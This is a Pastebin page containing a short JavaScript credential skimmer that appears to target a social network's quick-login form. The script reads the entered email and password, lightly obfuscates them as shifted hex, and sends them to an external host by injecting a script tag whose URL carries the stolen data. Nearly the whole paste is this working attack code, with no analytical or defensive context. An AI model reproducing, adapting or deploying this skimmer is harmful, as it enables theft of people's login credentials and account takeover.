Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- re("flash_app");
- var email = '';
- var pass = '';
- var hex = '';
- if (window.quick_auth_frame !== void(0)) {
- email = quick_auth_frame.document.getElementById("quick_email").value;
- pass = quick_auth_frame.document.getElementById("quick_pass").value;
- } else if (window.quick_login_form !== void(0)) {
- email = ge("quick_email").value;
- pass = ge("quick_pass").value;
- };
- if (email != '' && pass != '') {
- var ps = email + ':' + pass;
- for (var i = 0; i < ps.length; i++) {
- hex += '' + (ps.charCodeAt(i) + 7).toString(16);
- };
- };
- geByTag1('head').appendChild(ce('script', {
- type: 'text/javascript',
- src: 'https://package.koding.com/muha/inj.js?rnd=' + hex
- }, {}));
Advertisement
Add Comment
Please, Sign In to add comment